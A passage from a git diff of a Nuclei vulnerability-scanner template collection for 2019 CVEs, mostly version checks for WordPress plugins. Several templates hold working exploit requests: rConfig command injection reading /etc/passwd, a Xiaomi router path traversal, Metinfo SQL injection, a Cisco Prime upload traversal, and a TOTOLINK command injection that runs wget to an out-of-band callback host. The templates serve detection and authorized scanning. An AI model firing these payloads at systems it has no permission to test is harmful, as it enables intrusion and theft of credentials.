- matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "fv-wordpress-flowplayer" - part: body - - - type: dsl - dsl: - - compare_versions(version, '<= 7.3.18.727') \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-14313.yaml b/nuclei-templates/CVE-2019/CVE-2019-14313.yaml new file mode 100644 index 0000000000..1e4dc95699 --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-14313.yaml @@ -0,0 +1,58 @@ +id: CVE-2019-14313 + +info: + name: > + Photo Gallery by 10Web <= 1.5.30 - SQL Injection + author: topscoder + severity: critical + description: > + A SQL injection vulnerability exists in the 10Web Photo Gallery plugin before 1.5.31 for WordPress. Successful exploitation of this vulnerability would allow a remote attacker to execute arbitrary SQL commands on the affected system via filemanager/model.php. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/id/708c2c69-aa1b-4bfb-bef5-f2faa1e49a10?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-14313 + metadata: + fofa-query: "wp-content/plugins/photo-gallery/" + google-query: inurl:"/wp-content/plugins/photo-gallery/" + shodan-query: 'vuln:CVE-2019-14313' + tags: cve,wordpress,wp-plugin,photo-gallery,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/photo-gallery/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "photo-gallery" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5.31') \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-15107.yaml b/nuclei-templates/CVE-2019/CVE-2019-15107.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-15107.yaml rename to nuclei-templates/CVE-2019/CVE-2019-15107.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-15112.yaml b/nuclei-templates/CVE-2019/CVE-2019-15112.yaml deleted file mode 100644 index 79150a53b8..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-15112.yaml +++ /dev/null @@ -1,58 +0,0 @@ -id: CVE-2019-15112 - -info: - name: > - WP Slimstat <= 4.8 - Unauthenticated Stored Cross-Site Scripting from Visitors - author: topscoder - severity: medium - description: > - The wp-slimstat plugin before 4.8.1 for WordPress has XSS. - reference: - - https://www.wordfence.com/threat-intel/vulnerabilities/id/7fd8277c-b096-4cee-bd13-fcb8c8b00ca0?source=api-prod - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2019-15112 - metadata: - fofa-query: "wp-content/plugins/wp-slimstat/" - google-query: inurl:"/wp-content/plugins/wp-slimstat/" - shodan-query: 'vuln:CVE-2019-15112' - tags: cve,wordpress,wp-plugin,wp-slimstat,medium - -http: - - method: GET - redirects: true - max-redirects: 3 - path: - - "{{BaseURL}}/wp-content/plugins/wp-slimstat/readme.txt" - - extractors: - - type: regex - name: version - part: body - group: 1 - internal: true - regex: - - "(?mi)Stable tag: ([0-9.]+)" - - - type: regex - name: version - part: body - group: 1 - regex: - - "(?mi)Stable tag: ([0-9.]+)" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "wp-slimstat" - part: body - - - type: dsl - dsl: - - compare_versions(version, '<= 4.8') \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-15116.yaml b/nuclei-templates/CVE-2019/CVE-2019-15116.yaml new file mode 100644 index 0000000000..e1de8025b2 --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-15116.yaml @@ -0,0 +1,58 @@ +id: CVE-2019-15116 + +info: + name: > + Easy Digital Downloads – Simple eCommerce for Selling Digital Files <= 2.9.15 - Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + The easy-digital-downloads plugin before 2.9.16 for WordPress has XSS related to IP address logging. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/id/82259b54-0313-41a2-ace4-41e583b93e8a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-15116 + metadata: + fofa-query: "wp-content/plugins/easy-digital-downloads/" + google-query: inurl:"/wp-content/plugins/easy-digital-downloads/" + shodan-query: 'vuln:CVE-2019-15116' + tags: cve,wordpress,wp-plugin,easy-digital-downloads,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/easy-digital-downloads/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "easy-digital-downloads" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.9.16') \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-15713.yaml b/nuclei-templates/CVE-2019/CVE-2019-15713.yaml deleted file mode 100644 index 6b245fda70..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-15713.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2019-15713 -info: - name: WordPress My Calendar <= 3.1.9 - Cross-Site Scripting - author: daffainfo,dhiyaneshDk - severity: medium - description: WordPress plugin My Calendar <= 3.1.9 is susceptible to reflected cross-site scripting which can be triggered via unescaped usage of URL parameters in multiple locations throughout the site. - reference: - - https://wpscan.com/vulnerability/9267 - - https://wordpress.org/plugins/my-calendar/#developers - - https://nvd.nist.gov/vuln/detail/CVE-2019-15713 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2019-15713 - cwe-id: CWE-79 - tags: cve,cve2019,wordpress,xss,wp-plugin -requests: - - method: GET - path: - - '{{BaseURL}}/?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 - -# Enhanced by mp on 2022/04/21 diff --git a/nuclei-templates/CVE-2019/CVE-2019-16118.yaml b/nuclei-templates/CVE-2019/CVE-2019-16118.yaml deleted file mode 100644 index c910e9db6e..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-16118.yaml +++ /dev/null @@ -1,58 +0,0 @@ -id: CVE-2019-16118 - -info: - name: > - Photo Gallery by 10Web <= 1.5.34 - Cross-Site Scripting - author: topscoder - severity: medium - description: > - Cross site scripting (XSS) in the photo-gallery (10Web Photo Gallery) plugin before 1.5.35 for WordPress exists via admin/controllers/Options.php. - reference: - - https://www.wordfence.com/threat-intel/vulnerabilities/id/2e08e1b5-d388-46cf-a9e7-4bab2a09667f?source=api-prod - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2019-16118 - metadata: - fofa-query: "wp-content/plugins/photo-gallery/" - google-query: inurl:"/wp-content/plugins/photo-gallery/" - shodan-query: 'vuln:CVE-2019-16118' - tags: cve,wordpress,wp-plugin,photo-gallery,medium - -http: - - method: GET - redirects: true - max-redirects: 3 - path: - - "{{BaseURL}}/wp-content/plugins/photo-gallery/readme.txt" - - extractors: - - type: regex - name: version - part: body - group: 1 - internal: true - regex: - - "(?mi)Stable tag: ([0-9.]+)" - - - type: regex - name: version - part: body - group: 1 - regex: - - "(?mi)Stable tag: ([0-9.]+)" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "photo-gallery" - part: body - - - type: dsl - dsl: - - compare_versions(version, '<= 1.5.34') \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-16219.yaml b/nuclei-templates/CVE-2019/CVE-2019-16219.yaml new file mode 100644 index 0000000000..f45a83acaa --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-16219.yaml @@ -0,0 +1,60 @@ +id: CVE-2019-16219 + +info: + name: > + WordPress Core < 5.2.3 - Reflected Cross-Site Scripting via Shortcode Previews + author: topscoder + severity: medium + description: > + WordPress before 5.2.3 allows XSS in shortcode previews. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c510063e-1c64-40fa-842a-e7efd3dc550a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2019-16219 + metadata: + shodan-query: 'vuln:CVE-2019-16219' + tags: cve,wordpress,wp-core,medium + +http: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/wp-admin/install.php" + - "{{BaseURL}}/feed/" + - "{{BaseURL}}/?feed=rss2" # alternative if /feed/ is blocked + + redirects: true + max-redirects: 2 + stop-at-first-match: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - compare_versions(version_by_generator, '>= 5.2', '<= 5.2.2') + - compare_versions(version_by_js, '>= 5.2', '<= 5.2.2') + - compare_versions(version_by_css, '>= 5.2', '<= 5.2.2') + + - type: status + status: + - 200 + + extractors: + - type: regex + name: version_by_generator + group: 1 + regex: + - '(?m)https:\/\/wordpress.org\/\?v=([0-9.]+)' + + - type: regex + name: version_by_js + group: 1 + regex: + - 'wp-emoji-release\.min\.js\?ver=((\d+\.?)+)\b' + + - type: regex + name: version_by_css + group: 1 + regex: + - 'install\.min\.css\?ver=((\d+\.?)+)\b' diff --git a/nuclei-templates/CVE-2019/cve-2019-16313.yaml b/nuclei-templates/CVE-2019/CVE-2019-16313.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-16313.yaml rename to nuclei-templates/CVE-2019/CVE-2019-16313.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-16662.yaml b/nuclei-templates/CVE-2019/CVE-2019-16662.yaml new file mode 100644 index 0000000000..696076cc85 --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-16662.yaml @@ -0,0 +1,28 @@ +id: CVE-2019-16662 + +info: + name: rConfig 3.9.2 - Remote Code Execution + author: pikpikcu + severity: critical + reference: https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/ + tags: cve,cve2019,rce,intrusive,rconfig + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-16662 + cwe-id: CWE-78 + description: "An issue was discovered in rConfig 3.9.2. An attacker can directly execute system commands by sending a GET request to ajaxServerSettingsChk.php because the rootUname parameter is passed to the exec function without filtering, which can lead to command execution." + +requests: + - method: GET + path: + - "{{BaseURL}}/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "root:.*:0:0:" diff --git a/nuclei-templates/CVE-2019/CVE-2019-16996.yaml b/nuclei-templates/CVE-2019/CVE-2019-16996.yaml new file mode 100644 index 0000000000..83afea932a --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-16996.yaml @@ -0,0 +1,50 @@ +id: CVE-2019-16996 + +info: + name: Metinfo 7.0.0 beta - SQL Injection + author: ritikchaddha + severity: high + description: Metinfo 7.0.0 beta is susceptible to SQL Injection in app/system/product/admin/product_admin.class.php via the admin/?n=product&c=product_admin&a=dopara&app_type=shop id parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. + remediation: | + Upgrade to a patched version of Metinfo or apply the necessary security patches to mitigate the SQL Injection vulnerability. + reference: + - https://github.com/XiaOkuoAi/XiaOkuoAi.github.io/issues/1 + - https://nvd.nist.gov/vuln/detail/CVE-2019-16996 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/StarCrossPortal/scalpel + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2019-16996 + cwe-id: CWE-89 + epss-score: 0.33595 + epss-percentile: 0.96956 + cpe: cpe:2.3:a:metinfo:metinfo:7.0.0:beta:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: metinfo + product: metinfo + tags: cve2019,cve,metinfo,sqli + +http: + - method: GET + path: + - "{{BaseURL}}/admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "1918835981" + + - type: status + status: + - 200 +# digest: 4b0a00483046022100d7c28728a16c6d6e124df1e88628cfc2b4a62f577db56098997dd65775268ecf022100fb9bfc9e783a86672f070c74024492b2208acb2d01587036674ce8794fb3fc6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-17232.yaml b/nuclei-templates/CVE-2019/CVE-2019-17232.yaml new file mode 100644 index 0000000000..4adb8f7457 --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-17232.yaml @@ -0,0 +1,58 @@ +id: CVE-2019-17232 + +info: + name: > + Ultimate FAQ <= 1.8.24 - Unauthenticated Options Import/Export + author: topscoder + severity: critical + description: > + Functions/EWD_UFAQ_Import.php in the ultimate-faqs plugin through 1.8.24 for WordPress allows unauthenticated options import. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/id/eb562efb-eb17-4366-9f6d-02653df6ece1?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H + cvss-score: 9.1 + cve-id: CVE-2019-17232 + metadata: + fofa-query: "wp-content/plugins/ultimate-faqs/" + google-query: inurl:"/wp-content/plugins/ultimate-faqs/" + shodan-query: 'vuln:CVE-2019-17232' + tags: cve,wordpress,wp-plugin,ultimate-faqs,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ultimate-faqs/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ultimate-faqs" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.8.25') \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-17233.yaml b/nuclei-templates/CVE-2019/CVE-2019-17233.yaml deleted file mode 100644 index 2ec91adc06..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-17233.yaml +++ /dev/null @@ -1,58 +0,0 @@ -id: CVE-2019-17233 - -info: - name: > - Ultimate FAQ <= 1.8.24 - Cross-Site Scripting - author: topscoder - severity: medium - description: > - Functions/EWD_UFAQ_Import.php in the ultimate-faqs plugin through 1.8.24 for WordPress allows HTML content injection. - reference: - - https://www.wordfence.com/threat-intel/vulnerabilities/id/67f9f44b-badc-48d5-b1d9-11cd6501fa9b?source=api-prod - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2019-17233 - metadata: - fofa-query: "wp-content/plugins/ultimate-faqs/" - google-query: inurl:"/wp-content/plugins/ultimate-faqs/" - shodan-query: 'vuln:CVE-2019-17233' - tags: cve,wordpress,wp-plugin,ultimate-faqs,medium - -http: - - method: GET - redirects: true - max-redirects: 3 - path: - - "{{BaseURL}}/wp-content/plugins/ultimate-faqs/readme.txt" - - extractors: - - type: regex - name: version - part: body - group: 1 - internal: true - regex: - - "(?mi)Stable tag: ([0-9.]+)" - - - type: regex - name: version - part: body - group: 1 - regex: - - "(?mi)Stable tag: ([0-9.]+)" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "ultimate-faqs" - part: body - - - type: dsl - dsl: - - compare_versions(version, '<= 1.8.25') \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-17270.yaml b/nuclei-templates/CVE-2019/CVE-2019-17270.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-17270.yaml rename to nuclei-templates/CVE-2019/CVE-2019-17270.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-17382.yaml b/nuclei-templates/CVE-2019/CVE-2019-17382.yaml new file mode 100644 index 0000000000..8dfa5344ff --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-17382.yaml @@ -0,0 +1,37 @@ +id: CVE-2019-17382 + +info: + name: Zabbix Authentication Bypass + author: harshbothra_ + severity: critical + description: An issue was discovered in zabbix.php?action=dashboard.view&dashboardid=1 in Zabbix through 4.4. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report, Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin. + reference: https://www.exploit-db.com/exploits/47467 + tags: cve,cve2019,zabbix,fuzz,bypass,login + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 9.10 + cve-id: CVE-2019-17382 + cwe-id: CWE-639 + +requests: + - raw: + - | + GET /zabbix.php?action=dashboard.view&dashboardid={{ids}} HTTP/1.1 + Host: {{Hostname}} + Accept-Language: en-US,en;q=0.9 + + payloads: + ids: helpers/wordlists/numbers.txt + + threads: 50 + stop-at-first-match: true + matchers-condition: and + matchers: + + - type: status + status: + - 200 + + - type: word + words: + - "Dashboard" diff --git a/nuclei-templates/CVE-2019/CVE-2019-17506.yaml b/nuclei-templates/CVE-2019/CVE-2019-17506.yaml deleted file mode 100644 index 8e68f7fb78..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-17506.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2019-17506 - -info: - name: DLINK DIR-868L & DIR-817LW Info Leak - author: pikpikcu - severity: critical - description: There are some web interfaces without authentication requirements on D-Link DIR-868L B1-2.03 and DIR-817LW A1-1.04 routers. An attacker can get the router's username and password (and other information) via a DEVICE.ACCOUNT value for SERVICES in conjunction with AUTHORIZED_GROUP=1%0a to getcfg.php. This could be used to control the router remotely. - reference: https://github.com/dahua966/Routers-vuls/blob/master/DIR-868/name%26passwd.py - tags: cve,cve2019,dlink,router - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2019-17506 - cwe-id: CWE-306 - -requests: - - method: POST - path: - - "{{BaseURL}}/getcfg.php" - - body: | - SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a - headers: - Content-Type: text/xml - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "" - - "DEVICE.ACCOUNT" - part: body - condition: and diff --git a/nuclei-templates/CVE-2019/CVE-2019-17673.yaml b/nuclei-templates/CVE-2019/CVE-2019-17673.yaml deleted file mode 100644 index cc2a207470..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-17673.yaml +++ /dev/null @@ -1,60 +0,0 @@ -id: CVE-2019-17673 - -info: - name: > - WordPress Core < 5.2.4 - Cache Poisoning - author: topscoder - severity: high - description: > - WordPress before 5.2.4 is vulnerable to poisoning of the cache of JSON GET requests because certain requests lack a Vary: Origin header. - reference: - - https://www.wordfence.com/threat-intel/vulnerabilities/id/2144ba9f-cb0a-4b54-a23f-3ecb2548a490?source=api-prod - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L - cvss-score: 7.3 - cve-id: CVE-2019-17673 - metadata: - shodan-query: 'vuln:CVE-2019-17673' - tags: cve,wordpress,wp-core,high - -http: - - method: GET - path: - - "{{BaseURL}}" - - "{{BaseURL}}/wp-admin/install.php" - - "{{BaseURL}}/feed/" - - "{{BaseURL}}/?feed=rss2" # alternative if /feed/ is blocked - - redirects: true - max-redirects: 2 - stop-at-first-match: true - matchers-condition: and - matchers: - - type: dsl - dsl: - - compare_versions(version_by_generator, '>= 5.2', '<= 5.2.3') - - compare_versions(version_by_js, '>= 5.2', '<= 5.2.3') - - compare_versions(version_by_css, '>= 5.2', '<= 5.2.3') - - - type: status - status: - - 200 - - extractors: - - type: regex - name: version_by_generator - group: 1 - regex: - - '(?m)https:\/\/wordpress.org\/\?v=([0-9.]+)' - - - type: regex - name: version_by_js - group: 1 - regex: - - 'wp-emoji-release\.min\.js\?ver=((\d+\.?)+)\b' - - - type: regex - name: version_by_css - group: 1 - regex: - - 'install\.min\.css\?ver=((\d+\.?)+)\b' diff --git a/nuclei-templates/CVE-2019/CVE-2019-1821.yaml b/nuclei-templates/CVE-2019/CVE-2019-1821.yaml deleted file mode 100644 index 3c95729884..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-1821.yaml +++ /dev/null @@ -1,51 +0,0 @@ -id: CVE-2019-1821 - -info: - name: Cisco Prime Infrastructure Unauthorized RCE - author: _0xf4n9x_ - severity: critical - description: Cisco Prime Infrastructure Health Monitor HA TarArchive Directory Traversal Remote Code Execution Vulnerability. - reference: - - https://srcincite.io/blog/2019/05/17/panic-at-the-cisco-unauthenticated-rce-in-prime-infrastructure.html - - https://nvd.nist.gov/vuln/detail/CVE-2019-1821 - metadata: - shodan-query: 'http.title:"prime infrastructure"' - tags: cve,cve2019,rce,fileupload,unauth,intrusive,cisco - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2019-1821 - cwe-id: CWE-20 - -requests: - - raw: - - | - POST /servlet/UploadServlet HTTP/1.1 - Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Primary-IP: 127.0.0.1 - Filename: test.tar - Filesize: 10240 - Compressed-Archive: false - Destination-Dir: tftpRoot - Filecount: 1 - Content-Length: 269 - Content-Type: multipart/form-data; boundary=871a4a346a547cf05cb83f57b9ebcb83 - - --871a4a346a547cf05cb83f57b9ebcb83 - Content-Disposition: form-data; name="files"; filename="test.tar" - - ../../opt/CSCOlumos/tomcat/webapps/ROOT/test.txt0000644000000000000000000000000400000000000017431 0ustar 00000000000000{{randstr}} - --871a4a346a547cf05cb83f57b9ebcb83-- - - - | - GET /test.txt HTTP/1.1 - Host: {{Host}} - - req-condition: true - matchers: - - type: dsl - dsl: - - "status_code == 200" - - "contains((body_2), '{{randstr}}')" - condition: and diff --git a/nuclei-templates/CVE-2019/CVE-2019-18371.yaml b/nuclei-templates/CVE-2019/CVE-2019-18371.yaml new file mode 100644 index 0000000000..62b60facee --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-18371.yaml @@ -0,0 +1,43 @@ +id: CVE-2019-18371 + +info: + name: Xiaomi Mi WiFi R3G Routers - Local file Inclusion + author: ritikchaddha + severity: high + description: | + Xiaomi Mi WiFi R3G devices before 2.28.23-stable are susceptible to local file inclusion vulnerabilities via a misconfigured NGINX alias, as demonstrated by api-third-party/download/extdisks../etc/config/account. With this vulnerability, the attacker can bypass authentication. + remediation: | + Update the firmware of the Xiaomi Mi WiFi R3G routers to the latest version, which includes a fix for the local file inclusion vulnerability. + reference: + - https://ultramangaia.github.io/blog/2019/Xiaomi-Series-Router-Command-Execution-Vulnerability.html + - https://github.com/UltramanGaia/Xiaomi_Mi_WiFi_R3G_Vulnerability_POC/blob/master/arbitrary_file_read_vulnerability.py + - https://nvd.nist.gov/vuln/detail/CVE-2019-18371 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2019-18371 + cwe-id: CWE-22 + epss-score: 0.02376 + epss-percentile: 0.88739 + cpe: cpe:2.3:o:mi:millet_router_3g_firmware:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: mi + product: millet_router_3g_firmware + tags: cve2019,cve,lfi,router,mi,xiaomi + +http: + - method: GET + path: + - "{{BaseURL}}/api-third-party/download/extdisks../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 +# digest: 4a0a0047304502202ceca95e0d23de7e0a57b502dd0f9cdbcb2ff6275f928581667d5d77e31bd462022100c5340466ae8dcfee1d77f4663912ab93da119436b3e23013e6b82fa1f43129ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-19824.yaml b/nuclei-templates/CVE-2019/CVE-2019-19824.yaml deleted file mode 100644 index 6ae24e6e21..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-19824.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2019-19824 - -info: - name: TOTOLINK - Remote Code Execution - author: gy741 - severity: high - description: On certain TOTOLINK Realtek SDK based routers, an authenticated attacker may execute arbitrary OS commands via the sysCmd parameter to the boafrm/formSysCmd URI, even if the GUI (syscmd.htm) is not available. This allows for full control over the device's internals. This affects A3002RU through 2.0.0, A702R through 2.1.3, N301RT through 2.1.6, N302R through 3.4.0, N300RT through 3.4.0, N200RE through 4.0.0, N150RT through 3.4.0, and N100RE through 3.4.0. - reference: - - https://sploit.tech/2019/12/16/Realtek-TOTOLINK.html - - https://nvd.nist.gov/vuln/detail/CVE-2019-19824 - - https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2019-19824 - cwe-id: CWE-78 - tags: cve,cve2019,totolink,rce,router - -requests: - - raw: - - | - POST /boafrm/formSysCmd HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic YWRtaW46cGFzc3dvcmQ= - Content-Type: application/x-www-form-urlencoded - - submit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0&save_apply=Run+Command&sysCmd=wget+http://{{interactsh-url}} - - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" diff --git a/nuclei-templates/wordpress/CVE-2019-19985-4061.yaml b/nuclei-templates/CVE-2019/CVE-2019-19985.yaml similarity index 100% rename from nuclei-templates/wordpress/CVE-2019-19985-4061.yaml rename to nuclei-templates/CVE-2019/CVE-2019-19985.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-20141.yaml b/nuclei-templates/CVE-2019/CVE-2019-20141.yaml new file mode 100644 index 0000000000..2beaff3228 --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-20141.yaml @@ -0,0 +1,27 @@ +id: cve-2019-20141 + +info: + name: Neon Dashboard - XSS Reflected + author: knassar702 + severity: medium + description: An XSS issue was discovered in the Laborator Neon theme 2.0 for WordPress via the data/autosuggest-remote.php q parameter. + refrense: https://knassar7o2.blogspot.com/2019/12/neon-dashboard-cve-2019-20141.html + tags: cve,cve2019,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/data/autosuggest-remote.php?q=">' + - '{{BaseURL}}/admin/data/autosuggest-remote.php?q=">' + + matchers-condition: and + matchers: + - type: word + words: + - ">>)1(trela=rorreno" + part: body + + - type: word + words: + - "text/html" + part: header diff --git a/nuclei-templates/CVE-2019/CVE-2019-20209.yaml b/nuclei-templates/CVE-2019/CVE-2019-20209.yaml new file mode 100644 index 0000000000..41d707d63e --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-20209.yaml @@ -0,0 +1,58 @@ +id: CVE-2019-20209 + +info: + name: > + CTHthemes CityBook < 2.3.4, TownHub < 1.0.6, EasyBook < 1.2.2 Themes - Authenticated Post Deleition via IDOR + author: topscoder + severity: high + description: > + The CTHthemes CityBook before 2.3.4, TownHub before 1.0.6, and EasyBook before 1.2.2 themes for WordPress allow unspecified authenticated users to delete any page/post/listing via insecure Direct Object Reference (IDOR) + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/id/08eb1d49-9928-43f8-97fc-14105e3a4a25?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N + cvss-score: 7.5 + cve-id: CVE-2019-20209 + metadata: + fofa-query: "wp-content/themes/easybook/" + google-query: inurl:"/wp-content/themes/easybook/" + shodan-query: 'vuln:CVE-2019-20209' + tags: cve,wordpress,wp-theme,easybook,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/easybook/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "easybook" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.2') \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-20224.yaml 